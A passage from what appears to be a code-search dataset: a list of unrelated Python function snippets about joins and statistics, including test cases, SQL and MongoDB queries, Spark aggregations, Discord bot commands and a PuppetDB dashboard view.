i in range(settings.QUIZZZ_JOINED_COMMUNITIES_LIMIT):\n response = self.client.post(self.url, {\"name\": f\"test-group-{i}\"})\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n response = self.client.post(self.url, self.payload)\n self.assert_validation_failed(response, \n data=[\"You have reached the limit for communities joined.\"])", "def compute_graph_stats():\n\n #create a dictionary to hold the stats\n #note that it's set up as a defaultdict of defaultdicts, so as not to have\n #to create the structure ahead of time (the \"pretty\" is so it can be\n #pretty-printed for debugging purposes)\n stats = PrettyDefaultDict(lambda: PrettyDefaultDict(list))\n\n #compute the stats and add them to the dictionary\n for search_type in [\"BFS\", \"DFS\"]:\n for word_length in range(2, 11):\n\n #get all the relevant searches out of the database\n searches = (\n Search.query.filter(Search.search_type == search_type,\n Search.word_length == word_length)\n .all())\n\n #compute and store medians for path length, search time,\n #efficiency, and words explored\n med_path_length = median([search.med_path_length\n for search in searches])\n stats[\"pathLength\"][search_type].append(\n int(round(med_path_length)))\n\n\n med_search_time = median([search.med_search_time\n for search in searches])\n stats[\"searchTime\"][search_type].append(\n round(med_search_time, 1))\n\n\n med_efficiency = median([search.med_efficiency\n for search in searches])\n stats[\"efficiency\"][search_type].append(\n round(100 * med_efficiency, 1))\n\n\n med_words_explored = median([search.med_words_explored\n for search in searches])\n stats[\"wordsExplored\"][search_type].append(\n int(round(med_words_explored)))\n\n\n #add metadata to the dictionary for graphing purposes\n stats[\"wordLengths\"] = range(2, 11)\n stats[\"pathLength\"][\"yAxisLabel\"] = \"num words in path\"\n stats[\"searchTime\"][\"yAxisLabel\"] = \"search time (ms)\"\n stats[\"wordsExplored\"][\"yAxisLabel\"] = \"num words explored\"\n stats[\"efficiency\"][\"yAxisLabel\"] = \"% of explored words used\"\n\n # pprint(stats)\n\n return stats", "def on_join(data):\n print(str(data))\n if models.Leaderboard.query.filter_by(\n username=data['user']).first() is None:\n add_user(data['user'])\n users, scores = calculate_scores()\n socketio.emit('leaderboard_info', {'users': users, 'scores': scores})", "def test_join_after_invite(self) -> None:\n\n self._perform_background_initial_update()\n\n u1 = self.register_user(\"u1\", \"pass\")\n u1token = self.login(\"u1\", \"pass\")\n r1 = self.helper.create_room_as(u1, tok=u1token)\n\n u2 = self.register_user(\"u2\", \"pass\")\n u2token = self.login(\"u2\", \"pass\")\n\n self.helper.invite(r1, u1, u2, tok=u1token)\n\n r1stats_ante = self._get_current_stats(\"room\", r1)\n assert r1stats_ante is not None\n\n self.helper.join(r1, u2, tok=u2token)\n\n r1stats_post = self._get_current_stats(\"room\", r1)\n assert r1stats_post is not None\n\n self.assertEqual(\n r1stats_post[\"current_state_events\"] - r1stats_ante[\"current_state_events\"],\n 0,\n )\n self.assertEqual(\n r1stats_post[\"joined_members\"] - r1stats_ante[\"joined_members\"], +1\n )\n self.assertEqual(\n r1stats_post[\"invited_members\"] - r1stats_ante[\"invited_members\"], -1\n )", "def get_statistics(self):\n with self._conn.begin():\n stats = dict(\n self._conn.execute(\n \"SELECT * FROM get_statistics()\"\n ).first().items()\n )\n stats['builds_last_hour'] = {\n row.abi_tag: row.builds\n for row in self._conn.execute(\n \"SELECT * FROM get_builds_last_hour()\"\n )\n }\n return stats", "def on_join(bot, trigger):\n\tfor channel in trigger.args[0].split(','):\n\t\tlog(bot, channel, '*** {} has joined {}', trigger.nick, channel);", "def outlet_stats(args: Dict[str, Any]) -> List[object]:\n query = [\n {\n \"$match\": {\n \"body\": {\"$ne\": \"\"},\n \"quotesUpdated\": {\"$exists\": True},\n \"outlet\": {\"$in\": args[\"outlets\"]},\n \"publishedAt\": {\n \"$gte\": args[\"begin_date\"],\n \"$lt\": args[\"end_date\"] + timedelta(days=1),\n },\n }\n },\n {\n \"$group\": {\n \"_id\": \"$outlet\",\n \"totalArticles\": {\"$sum\": 1},\n \"totalQuotes\": {\"$sum\": \"$quoteCount\"},\n \"peopleFemaleCount\": {\"$sum\": \"$peopleFemaleCount\"},\n \"peopleMaleCount\": {\"$sum\": \"$peopleMaleCount\"},\n \"peopleUnknownCount\": {\"$sum\": \"$peopleUnknownCount\"},\n \"sourcesFemaleCount\": {\"$sum\": \"$sourcesFemaleCount\"},\n \"sourcesMaleCount\": {\"$sum\": \"$sourcesMaleCount\"},\n \"sourcesUnknownCount\": {\"$sum\": \"$sourcesUnknownCount\"},\n \"authorsFemaleCount\": {\"$sum\": \"$authorsFemaleCount\"},\n \"authorsMaleCount\": {\"$sum\": \"$authorsMaleCount\"},\n \"authorsUnknownCount\": {\"$sum\": \"$authorsUnknownCount\"},\n }\n },\n ]\n return query", "def test_join_first_time(self) -> None:\n\n self._perform_background_initial_update()\n\n u1 = self.register_user(\"u1\", \"pass\")\n u1token = self.login(\"u1\", \"pass\")\n r1 = self.helper.create_room_as(u1, tok=u1token)\n\n u2 = self.register_user(\"u2\", \"pass\")\n u2token = self.login(\"u2\", \"pass\")\n\n r1stats_ante = self._get_current_stats(\"room\", r1)\n assert r1stats_ante is not None\n\n self.helper.join(r1, u2, tok=u2token)\n\n r1stats_post = self._get_current_stats(\"room\", r1)\n assert r1stats_post is not None\n\n self.assertEqual(\n r1stats_post[\"current_state_events\"] - r1stats_ante[\"current_state_events\"],\n 1,\n )\n self.assertEqual(\n r1stats_post[\"joined_members\"] - r1stats_ante[\"joined_members\"], 1\n )", "def minion_connection_stats(self, minions):\n\n online_minions = list()\n offline_minions = list()\n expired_minions = list()\n\n for minion_obj in minions:\n\n # get UTC current date time\n current_datetime = datetime.datetime.utcnow()\n current_datetime = current_datetime.replace(tzinfo=pytz.utc)\n\n # get the last seen date time\n last_seen = minion_obj.last_seen\n\n # get the time difference\n try:\n delta_diff = current_datetime - last_seen\n except Exception as err:\n delta_diff = None\n\n if delta_diff:\n days_count = delta_diff.days\n else:\n # just to make sure if empty datetime is handled\n days_count = 99999\n\n # is minion up since x days\n if days_count >= settings.MINION_EXPIRY:\n expired_minions.append(minion_obj)\n\n # get a list of minions up\n elif minion_obj.is_minion_up:\n online_minions.append(minion_obj)\n\n # get all offline minions\n elif not minion_obj.is_minion_up:\n offline_minions.append(minion_obj)\n\n return dict(online_minions=len(online_minions),\n expired_minions=len(expired_minions),\n offline_minions=len(offline_minions))", "def _get_adjoining_hashes(self, hashcode, precision):\n if precision > len(hashcode):\n raise ValueError('Precision greater than hashcode size.')\n reduced_hash = hashcode[:precision]\n\n return geohash.neighbors(reduced_hash)", "async def cmd_stats(self, ctx):\n\n guild = ctx.guild\n members = await guild.fetch_members().flatten()\n answer = f''\n embed = discord.Embed(title=\"Statistiken\",\n description=f'Wir haben aktuell {len(members)} Mitglieder auf diesem Server, verteilt auf folgende Rollen:')\n\n for role in guild.roles:\n if not self.get_key(role):\n continue\n role_members = role.members\n if len(role_members) > 0 and not role.name.startswith(\"Farbe\"):\n embed.add_field(name=role.name, value=f'{len(role_members)} Mitglieder', inline=False)\n\n no_role = 0\n for member in members:\n # ToDo Search for study roles only!\n if len(member.roles) == 1:\n no_role += 1\n\n embed.add_field(name=\"\\u200B\", value=\"\\u200b\", inline=False)\n embed.add_field(name=\"Mitglieder ohne Rolle\", value=str(no_role), inline=False)\n\n await ctx.channel.send(answer, embed=embed)", "def cluster_create_join_progress_get(self, desired_attributes=None):\n return self.request( \"cluster-create-join-progress-get\", {\n 'desired_attributes': [ desired_attributes, 'desired-attributes', [ ClusterCreateJoinProgressInfo, 'None' ], False ],\n }, {\n 'attributes': [ ClusterCreateJoinProgressInfo, False ],\n } )", "def testCorrectJoin(self):\n b_tree = OOBTree()\n b_tree.update({1: \"Monkey D. Luffy\", 2: \"Roronoa Zoro\", 3: \"Nami\"})\n failed_counter = 0\n key = 1\n data = {\"from\":\"East Blue\"}\n (mod_data, mod_tree, failed_counter) = self.processing.join(b_tree, key, data, failed_counter)\n self.assertEqual(mod_data, {\"from\":\"East Blue\", \"right_data\":\"Monkey D. Luffy\"})\n self.assertEqual(len(mod_tree), 2)\n self.assertEqual(failed_counter, 0)", "def encoding_join_conditions(self):\n\n all_conditions = self.get_all_join_conditions()\n db_info = get_db_info('imdb')\n all_columns = db_info['flatten_columns']\n join_info = get_join_info('imdb')\n columns_num = len(all_columns)\n # TODO sparse matrix\n join_weight_matrix = np.zeros((columns_num, columns_num))\n join_vector = np.zeros((columns_num, 1))\n for condition in all_conditions:\n assert condition.function == 'eq'\n assert len(condition.args) == 2\n c_i, c_j = condition.args\n if (c_i, c_j) in db_info:\n selctivity = db_info[(c_i, c_j)]\n i, j = all_columns.index(c_i), all_columns.index(c_j)\n join_weight_matrix[i][j] = selctivity\n join_vector[i] = np.array([1])\n # build symmetric adjacency matrix\n\n adj = normalize(join_weight_matrix +\n np.eye(join_weight_matrix.shape[0]))\n return adj, join_vector", "def features_websessions(df_customers, df_websessions):\n df_websessions = df_customers.join(df_websessions, \"customerId2\", 'inner')\n res_counts = df_websessions.groupBy('customerId2').count().alias('nb_sessions')\n\n res_agg = df_websessions.groupBy('customerId2').agg(\n min('pageViewCount').alias('min_pageViewCount'),\n mean('pageViewCount').alias('mean_pageViewCount'),\n max('pageViewCount').alias('max_pageViewCount'),\n (count(when(df_websessions.pageViewCount != 0, True)) / count('customerId2')).alias('p_not0_pageViewCount'),\n\n min('nonPageViewEventsCount').alias('min_nonPageViewEventsCount'),\n mean('nonPageViewEventsCount').alias('mean_nonPageViewEventsCount'),\n max('nonPageViewEventsCount').alias('max_nonPageViewEventsCount'),\n (count(when(df_websessions.nonPageViewEventsCount != 0, True)) / count('customerId2')).alias(\n 'p_not0_nonPageViewEventsCount'),\n\n min('productViewCount').alias('min_productViewCount'),\n mean('productViewCount').alias('mean_productViewCount'),\n max('productViewCount').alias('max_productViewCount'),\n (count(when(df_websessions.productViewCount != 0, True)) / count('customerId2')).alias('p_not0_productViewCount'),\n\n min('productViewsDistinctCount').alias('min_productViewsDistinctCount'),\n mean('productViewsDistinctCount').alias('mean_productViewsDistinctCount'),\n max('productViewsDistinctCount').alias('max_productViewsDistinctCount'),\n (count(when(df_websessions.productViewsDistinctCount != 0, True)) / count('customerId2')).alias(\n 'p_not0_productViewsDistinctCount'),\n\n min('productsAddedToBagCount').alias('min_productsAddedToBagCount'),\n mean('productsAddedToBagCount').alias('mean_productsAddedToBagCount'),\n max('productsAddedToBagCount').alias('max_productsAddedToBagCount'),\n (count(when(df_websessions.productsAddedToBagCount != 0, True)) / count('customerId2')).alias(\n 'p_not0_productsAddedToBagCount'),\n\n min('productsSavedForLaterFromProductPageCount').alias('min_productsSavedForLaterFromProductPageCount'),\n mean('productsSavedForLaterFromProductPageCount').alias('mean_productsSavedForLaterFromProductPageCount'),\n max('productsSavedForLaterFromProductPageCount').alias('max_productsSavedForLaterFromProductPageCount'),\n (count(when(df_websessions.productsSavedForLaterFromProductPageCount != 0, True)) / count('customerId2')).alias(\n 'p_not0_productsSavedForLaterFromProductPageCount'),\n\n min('productsSavedForLaterFromCategoryPageCount').alias('min_productsSavedForLaterFromCategoryPageCount'),\n mean('productsSavedForLaterFromCategoryPageCount').alias('mean_productsSavedForLaterFromCategoryPageCount'),\n max('productsSavedForLaterFromCategoryPageCount').alias('max_productsSavedForLaterFromCategoryPageCount'),\n (count(when(df_websessions.productsSavedForLaterFromCategoryPageCount != 0, True)) / count('customerId2')).alias(\n 'p_not0_productsSavedForLaterFromCategoryPageCount'),\n\n min('productsPurchasedDistinctCount').alias('min_productsPurchasedDistinctCount'),\n mean('productsPurchasedDistinctCount').alias('mean_productsPurchasedDistinctCount'),\n max('productsPurchasedDistinctCount').alias('max_productsPurchasedDistinctCount'),\n (count(when(df_websessions.productsPurchasedDistinctCount != 0, True)) / count('customerId2')).alias(\n 'p_not0_productsPurchasedDistinctCount'),\n\n min('productsPurchasedTotalCount').alias('min_productsPurchasedTotalCount'),\n mean('productsPurchasedTotalCount').alias('mean_productsPurchasedTotalCount'),\n max('productsPurchasedTotalCount').alias('max_productsPurchasedTotalCount'),\n (count(when(df_websessions.productsPurchasedTotalCount != 0, True)) / count('customerId2')).alias(\n 'p_not0_productsPurchasedTotalCount'),\n )\n\n res = res_counts.join(res_agg, 'customerId2')\n return res", "def getPopualrAuthors():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n c.execute(\" select count(*) as views , authors.name from articles \"\n + \" inner join \"\n + \"log on concat('/article/', articles.slug) = log.path \"\n + \" inner join authors on articles.author = authors.id \"\n + \"group by name order by views desc; \")\n authors = c.fetchall()\n db.close()\n return authors", "def totalJoinerCount(self) -> int:\n return len(self._joiner_list)", "def translate_joining_props(self, translators):\n df = self.load_from_hadoop_to_dateframe()\n for j in self.parser.joining_nodes:\n joining_index_translator = translators[j.joining_index]\n if joining_index_translator.current_step > 0:\n df = self.join_to_an_index(df, joining_index_translator, j)\n return self.return_dataframe(df, Translator.translate_joining_props.__qualname__)", "async def fetch_referrals(self):\n data = await self.http.get_referral_statistics()", "def testFailedJoin(self):\n b_tree = OOBTree()\n b_tree.update({1: \"Monkey D. Luffy\", 2: \"Roronoa Zoro\", 3: \"Nami\"})\n failed_counter = 0\n key = 10\n data = {\"from\":\"East Blue\"}\n (mod_data, mod_tree, failed_counter) = self.processing.join(b_tree, key, data, failed_counter)\n self.assertEqual(mod_data, {\"from\":\"East Blue\"})\n self.assertEqual(len(mod_tree), 3)\n self.assertEqual(failed_counter, 1)", "def on_join(data):\n logger.info(f\"Joining: {data}\")\n to = data[\"to\"]\n if to in TO_OPTIONS.keys():\n join_room(to)\n logger.info(f\"Rooms: {rooms()}\")\n else:\n logger.warning(f\"{to} not in TO_OPTIONS\")", "def getJoiningTime(self):\n return self.__joinTime", "async def on_member_join(member):\r\n pass", "def RefreshStats(self):\n with self.ctx.Profile(\n 2,\n lambda t: (\n \"Computed stats over \"\n f\"{humanize.BinaryPrefix(stats.graph_data_size, 'B')} database \"\n f\"({humanize.Plural(stats.graph_count, 'graph')})\"\n ),\n ), self.Session() as session:\n query = session.query(\n # Graph and IR counts.\n sql.func.count(GraphTuple.id).label(\"graph_count\"),\n sql.func.count(sql.func.distinct(GraphTuple.ir_id)).label(\"ir_count\"),\n sql.func.count(sql.func.distinct(GraphTuple.split)).label(\n \"split_count\"\n ),\n # Node and edge attribute sums.\n sql.func.sum(GraphTuple.node_count).label(\"node_count\"),\n sql.func.sum(GraphTuple.control_edge_count).label(\"control_edge_count\"),\n sql.func.sum(GraphTuple.data_edge_count).label(\"data_edge_count\"),\n sql.func.sum(GraphTuple.call_edge_count).label(\"call_edge_count\"),\n sql.func.sum(\n GraphTuple.control_edge_count\n + GraphTuple.data_edge_count\n + GraphTuple.call_edge_count\n ).label(\"edge_count\"),\n # Node and edge attribute maximums.\n sql.func.max(GraphTuple.node_count).label(\"node_count_max\"),\n sql.func.max(GraphTuple.control_edge_count).label(\n \"control_edge_count_max\"\n ),\n sql.func.max(GraphTuple.data_edge_count).label(\"data_edge_count_max\"),\n sql.func.max(GraphTuple.call_edge_count).label(\"call_edge_count_max\"),\n sql.func.max(GraphTuple.call_edge_count).label(\"call_edge_count_max\"),\n sql.func.max(\n GraphTuple.control_edge_count\n + GraphTuple.data_edge_count\n + GraphTuple.call_edge_count\n ).label(\"edge_count_max\"),\n sql.func.max(GraphTuple.edge_position_max).label(\"edge_position_max\"),\n # Feature and label dimensionality counts. Each of these columns\n # should be one, showing that there is a single value for all graph\n # tuples.\n sql.func.count(\n sql.func.distinct(GraphTuple.node_x_dimensionality)\n ).label(\"node_x_dimensionality_count\"),\n sql.func.count(\n sql.func.distinct(GraphTuple.node_y_dimensionality)\n ).label(\"node_y_dimensionality_count\"),\n sql.func.count(\n sql.func.distinct(GraphTuple.graph_x_dimensionality)\n ).label(\"graph_x_dimensionality_count\"),\n sql.func.count(\n sql.func.distinct(GraphTuple.graph_y_dimensionality)\n ).label(\"graph_y_dimensionality_count\"),\n # Feature and label dimensionalities.\n sql.func.max(GraphTuple.node_x_dimensionality).label(\n \"node_x_dimensionality\"\n ),\n sql.func.max(GraphTuple.node_y_dimensionality).label(\n \"node_y_dimensionality\"\n ),\n sql.func.max(GraphTuple.graph_x_dimensionality).label(\n \"graph_x_dimensionality\"\n ),\n sql.func.max(GraphTuple.graph_y_dimensionality).label(\n \"graph_y_dimensionality\"\n ),\n # Graph tuple sizes.\n sql.func.sum(GraphTuple.pickled_graph_tuple_size).label(\n \"graph_data_size\"\n ),\n sql.func.min(GraphTuple.pickled_graph_tuple_size).label(\n \"graph_data_size_min\"\n ),\n sql.func.avg(GraphTuple.pickled_graph_tuple_size).label(\n \"graph_data_size_avg\"\n ),\n sql.func.max(GraphTuple.pickled_graph_tuple_size).label(\n \"graph_data_size_max\"\n ),\n # Data flow column null counts.\n sql.func.count(GraphTuple.data_flow_steps).label(\n \"data_flow_steps_count\"\n ),\n # Data flow step counts.\n sql.func.min(GraphTuple.data_flow_steps).label(\"data_flow_steps_min\"),\n sql.func.avg(GraphTuple.data_flow_steps).label(\"data_flow_steps_avg\"),\n sql.func.max(GraphTuple.data_flow_steps).label(\"data_flow_steps_max\"),\n # Data flow positive node count.\n sql.func.min(GraphTuple.data_flow_positive_node_count).label(\n \"data_flow_positive_node_count_min\"\n ),\n sql.func.avg(GraphTuple.data_flow_positive_node_count).label(\n \"data_flow_positive_node_count_avg\"\n ),\n sql.func.max(GraphTuple.data_flow_positive_node_count).label(\n \"data_flow_positive_node_count_max\"\n ),\n )\n\n # Ignore \"empty\" graphs.\n query = query.filter(GraphTuple.node_count > 1)\n\n # Compute the stats.\n stats = query.one()\n\n # Check that databases have a consistent value for dimensionalities.\n if stats.node_x_dimensionality_count > 1:\n raise ValueError(\n f\"Database contains {stats.node_x_dimensionality_count} \"\n \"distinct node x dimensionalities\"\n )\n if stats.node_y_dimensionality_count > 1:\n raise ValueError(\n f\"Database contains {stats.node_y_dimensionality_count} \"\n \"distinct node y dimensionalities\"\n )\n if stats.graph_x_dimensionality_count > 1:\n raise ValueError(\n f\"Database contains {stats.graph_x_dimensionality_count} \"\n \"distinct graph x dimensionalities\"\n )\n if stats.graph_y_dimensionality_count > 1:\n raise ValueError(\n f\"Database contains {stats.graph_y_dimensionality_count} \"\n \"distinct graph y dimensionalities\"\n )\n\n # Check that every graph has data flow attributes, or none of them do.\n if not (\n stats.data_flow_steps_count == 0\n or stats.data_flow_steps_count == stats.graph_count\n ):\n raise ValueError(\n f\"{stats.graph_count - stats.data_flow_steps_count} of \"\n f\"{stats.graph_count} graphs have no data_flow_steps \"\n \"value\"\n )\n\n self._graph_tuple_stats = stats\n\n with self.Session() as session:\n self._splits = sorted(\n set(\n [\n row.split\n for row in session.query(GraphTuple.split)\n .filter(GraphTuple.split != None)\n .group_by(GraphTuple.split)\n ]\n )\n )\n\n self._split_counts = {\n split: session.query(sql.func.count(GraphTuple.id))\n .filter(GraphTuple.split == split)\n .scalar()\n for split in self._splits\n }", "def get_links(proj,exp):\n response = do_method(\"experiment.info\",\n {\"proj\":proj,\"exp\":exp,\"aspect\":\"links\"})\n check_response(response)\n return response['value']", "def _join_many(self, request_objects, extract=False, ignore_404=False):\n gevent.joinall(request_objects)\n results = []\n for g in request_objects:\n response = g.value\n if not response.ok:\n if response.status_code == 404 and ignore_404:\n continue\n raise SpotifyException(response.request, response)\n if not response.text:\n results.append(None)\n continue\n # yield None\n # continue\n jso = response.json()\n if extract:\n results += [x for x in extract_list(jso)]\n # yield from find_item(extract, jso)\n else:\n results.append(jso)\n return results", "def _format_joining_functions(self):\n ## TODO: Extend to n possible neighs_info elements\n if self.staticneighs:\n if self.ifdistance:\n self.join_neighs_and = join_neighsinfo_AND_static_dist\n self.join_neighs_or = join_neighsinfo_OR_static_dist\n self.join_neighs_xor = join_neighsinfo_XOR_static_dist\n else:\n self.join_neighs_and = join_neighsinfo_AND_static_notdist\n self.join_neighs_or = join_neighsinfo_OR_static_notdist\n self.join_neighs_xor = join_neighsinfo_XOR_static_notdist\n else:\n if self.ifdistance:\n self.join_neighs_and = join_neighsinfo_AND_notstatic_dist\n self.join_neighs_or = join_neighsinfo_OR_notstatic_dist\n self.join_neighs_xor = join_neighsinfo_XOR_notstatic_dist\n else:\n self.join_neighs_and = join_neighsinfo_AND_notstatic_notdist\n self.join_neighs_or = join_neighsinfo_OR_notstatic_notdist\n self.join_neighs_xor = join_neighsinfo_XOR_notstatic_notdist", "async def generate_leg_statistics(self) -> list:\n\n # General total amount of things\n amount_of_sessions = await self.bot.db.fetchval(\"SELECT COUNT(id) FROM legislature_sessions\")\n amount_of_bills = await self.bot.db.fetchval(\"SELECT COUNT(id) FROM legislature_bills\")\n amount_of_laws = await self.bot.db.fetchval(\"SELECT COUNT(law_id) FROM legislature_laws\")\n amount_of_motions = await self.bot.db.fetchval(\"SELECT COUNT(id) FROM legislature_motions\")\n\n # Sorted statistics by Discord Member\n amount_of_bills_by_submitter = self.count_rows_from_db_record(await self.bot.db.fetch(\"SELECT submitter FROM \"\n \"legislature_bills\"),\n 'submitter')\n amount_of_sessions_by_speaker = self.count_rows_from_db_record(await self.bot.db.fetch(\"SELECT speaker FROM \"\n \"legislature_sessions\"),\n 'speaker')\n query = \"\"\"SELECT submitter FROM legislature_bills AS b WHERE exists (SELECT 1 FROM legislature_laws l\n WHERE l.bill_id = b.id)\"\"\"\n amount_of_laws_by_submitter = self.count_rows_from_db_record(await self.bot.db.fetch(query), 'submitter')\n\n # Prettified sorted statistics by discord.Member\n pretty_top_submitter = self.get_pretty_stats(self.sort_dict_by_value(amount_of_bills_by_submitter), 'bills')\n\n pretty_top_speaker = self.get_pretty_stats(self.sort_dict_by_value(amount_of_sessions_by_speaker), 'sessions')\n\n pretty_top_lawmaker = self.get_pretty_stats(self.sort_dict_by_value(amount_of_laws_by_submitter), 'laws')\n\n return [amount_of_sessions, amount_of_bills, amount_of_laws, amount_of_motions,\n pretty_top_submitter, pretty_top_speaker, pretty_top_lawmaker]", "def make_join_graph(parsed_join_clauses):\n g = nx.Graph()\n for t1, c1, t2, c2 in parsed_join_clauses:\n g.add_node(t1)\n g.add_node(t2)\n if not g.has_edge(t1, t2):\n g.add_edge(t1, t2, join_columns={t1: [c1], t2: [c2]})\n else:\n edge = g[t1][t2]\n edge[\"join_columns\"][t1].append(c1)\n edge[\"join_columns\"][t2].append(c2)\n return g", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def gives_stats():\n dict_count = {\n \"amenities\": storage.count(Amenity),\n \"cities\": storage.count(City),\n \"places\": storage.count(Place),\n \"reviews\": storage.count(Review),\n \"states\": storage.count(State),\n \"users\": storage.count(User)\n }\n return jsonify(dict_count)", "def get_grades(self, test=None):\r\n target_url = \"https://elearning.linnbenton.edu\\\r\n/grade/report/overview/index.php?id=2721\"\r\n\r\n if test is not None:\r\n target_url = test\r\n\r\n self.web_driver.get(target_url)\r\n self.write_log(f\"Navigating to {target_url}\")\r\n time.sleep(5)\r\n self.write_log(\"Scraping begun.\")\r\n return self.scrape_grades()", "def iteratehelper(links, ranks, contributer, count):\n \n ranks=ranks.cache()\n links=links.cache()\n contributer=contributer.cache()\n \n for iteration in range(count):\n print('Running %d iteration' %(iteration))\n contribs = links.join(ranks).flatMap(lambda url_urls_rank: computeContribs(url_urls_rank[1][0], url_urls_rank[1][1]))\n \n ranks = contribs.reduceByKey(lambda x,y:x+y).mapValues(lambda rank: rank * 0.85 + 0.15)\n \n ranks.take(1)\n\n return ranks", "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def index(env):\n envs = environments()\n metrics = {\n 'num_nodes': 0,\n 'num_resources': 0,\n 'avg_resources_node': 0}\n check_env(env, envs)\n\n if env == '*':\n query = app.config['OVERVIEW_FILTER']\n\n prefix = 'puppetlabs.puppetdb.population'\n query_type = ''\n\n # Puppet DB version changed the query format from 3.2.0\n # to 4.0 when querying mbeans\n if get_db_version(puppetdb) < (4, 0, 0):\n query_type = 'type=default,'\n\n num_nodes = get_or_abort(\n puppetdb.metric,\n \"{0}{1}\".format(prefix, ':%sname=num-nodes' % query_type))\n num_resources = get_or_abort(\n puppetdb.metric,\n \"{0}{1}\".format(prefix, ':%sname=num-resources' % query_type))\n avg_resources_node = get_or_abort(\n puppetdb.metric,\n \"{0}{1}\".format(prefix,\n ':%sname=avg-resources-per-node' % query_type))\n metrics['num_nodes'] = num_nodes['Value']\n metrics['num_resources'] = num_resources['Value']\n metrics['avg_resources_node'] = \"{0:10.0f}\".format(\n avg_resources_node['Value'])\n else:\n query = AndOperator()\n query.add(EqualsOperator('catalog_environment', env))\n query.add(EqualsOperator('facts_environment', env))\n\n num_nodes_query = ExtractOperator()\n num_nodes_query.add_field(FunctionOperator('count'))\n num_nodes_query.add_query(query)\n\n if app.config['OVERVIEW_FILTER'] is not None:\n query.add(app.config['OVERVIEW_FILTER'])\n\n num_resources_query = ExtractOperator()\n num_resources_query.add_field(FunctionOperator('count'))\n num_resources_query.add_query(EqualsOperator(\"environment\", env))\n\n num_nodes = get_or_abort(\n puppetdb._query,\n 'nodes',\n query=num_nodes_query)\n num_resources = get_or_abort(\n puppetdb._query,\n 'resources',\n query=num_resources_query)\n metrics['num_nodes'] = num_nodes[0]['count']\n metrics['num_resources'] = num_resources[0]['count']\n try:\n metrics['avg_resources_node'] = \"{0:10.0f}\".format(\n (num_resources[0]['count'] / num_nodes[0]['count']))\n except ZeroDivisionError:\n metrics['avg_resources_node'] = 0\n\n nodes = get_or_abort(puppetdb.nodes,\n query=query,\n unreported=app.config['UNRESPONSIVE_HOURS'],\n with_status=True)\n\n nodes_overview = []\n stats = {\n 'changed': 0,\n 'unchanged': 0,\n 'failed': 0,\n 'unreported': 0,\n 'noop': 0\n }\n\n for node in nodes:\n if node.status == 'unreported':\n stats['unreported'] += 1\n elif node.status == 'changed':\n stats['changed'] += 1\n elif node.status == 'failed':\n stats['failed'] += 1\n elif node.status == 'noop':\n stats['noop'] += 1\n else:\n stats['unchanged'] += 1\n\n if node.status != 'unchanged':\n nodes_overview.append(node)\n\n return render_template(\n 'index.html',\n metrics=metrics,\n nodes=nodes_overview,\n stats=stats,\n envs=envs,\n current_env=env\n )", "def get_joins(self, model, **kwargs):\n node_path = self._node_path(model)\n\n joins = []\n for i, node in enumerate(node_path):\n # ignore each subsequent first join in the set of joins for a\n # given model\n if i > 0:\n joins.extend(node.get_joins(**kwargs)[1:])\n else:\n joins.extend(node.get_joins(**kwargs))\n\n return joins", "def getPopularArticles():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n c.execute(\" select count (*) as views, title from articles \"\n + \"left join \"\n + \"log on concat('/article/', articles.slug) = log.path \"\n + \"group by title order by views desc limit 3\")\n views = c.fetchall()\n db.close()\n return views", "def db_stats(args: Dict[str, Any]) -> List[object]:\n query = [\n {\n \"$match\": {\n \"body\": {\"$ne\": \"\"},\n \"quotesUpdated\": {\"$exists\": True},\n \"outlet\": {\"$in\": args[\"outlets\"]},\n \"publishedAt\": {\n \"$gte\": args[\"begin_date\"],\n \"$lt\": args[\"end_date\"] + timedelta(days=1),\n },\n }\n },\n {\n \"$group\": {\n \"_id\": \"null\",\n \"totalArticles\": {\"$sum\": 1},\n \"totalQuotes\": {\"$sum\": \"$quoteCount\"},\n \"peopleFemaleCount\": {\"$sum\": \"$peopleFemaleCount\"},\n \"peopleMaleCount\": {\"$sum\": \"$peopleMaleCount\"},\n \"peopleUnknownCount\": {\"$sum\": \"$peopleUnknownCount\"},\n \"sourcesFemaleCount\": {\"$sum\": \"$sourcesFemaleCount\"},\n \"sourcesMaleCount\": {\"$sum\": \"$sourcesMaleCount\"},\n \"sourcesUnknownCount\": {\"$sum\": \"$sourcesUnknownCount\"},\n \"authorsFemaleCount\": {\"$sum\": \"$authorsFemaleCount\"},\n \"authorsMaleCount\": {\"$sum\": \"$authorsMaleCount\"},\n \"authorsUnknownCount\": {\"$sum\": \"$authorsUnknownCount\"},\n }\n },\n ]\n return query", "def get_results_from_aggregation_sources(self, context):", "def get_stats():\r\n stats = {\r\n \"progress_precent\": 100.0*finished_work_units_amount/work_units_amount,\r\n \"results\": None if work_status == Db.WorkStatusNames.finished_work.value else Db.collect_results(),\r\n #If it's already finished, then all the results were already sent to the main server.\r\n }\r\n return stats", "def _compute_experiment_statistics(self):\n pass", "def get_moorings_urls(varname=None, site=None, featuretype=None, fileversion=None, datacategory=None, realtime=None, timestart=None, timeend=None, filterout=None):\n\n WEBROOT = 'http://thredds.aodn.org.au/thredds/dodsC/'\n\n if realtime:\n if realtime.lower() == \"yes\":\n url = \"http://geoserver-123.aodn.org.au/geoserver/ows?typeName=moorings_all_map&SERVICE=WFS&REQUEST=GetFeature&VERSION=1.0.0&outputFormat=csv&CQL_FILTER=(realtime=TRUE)\"\n elif realtime.lower() == \"no\":\n url = \"http://geoserver-123.aodn.org.au/geoserver/ows?typeName=moorings_all_map&SERVICE=WFS&REQUEST=GetFeature&VERSION=1.0.0&outputFormat=csv&CQL_FILTER=(realtime=FALSE)\"\n else:\n raise ValueError('ERROR: realtime %s is not valid' % realtime)\n else:\n url = \"http://geoserver-123.aodn.org.au/geoserver/ows?typeName=moorings_all_map&SERVICE=WFS&REQUEST=GetFeature&VERSION=1.0.0&outputFormat=csv\"\n\n df = pd.read_csv(url)\n df = df.sort_values(by='time_coverage_start')\n criteria_all = df.url != None\n\n if varname:\n separator = ', '\n varnames_all = set(separator.join(list(df.variables)).split(', '))\n 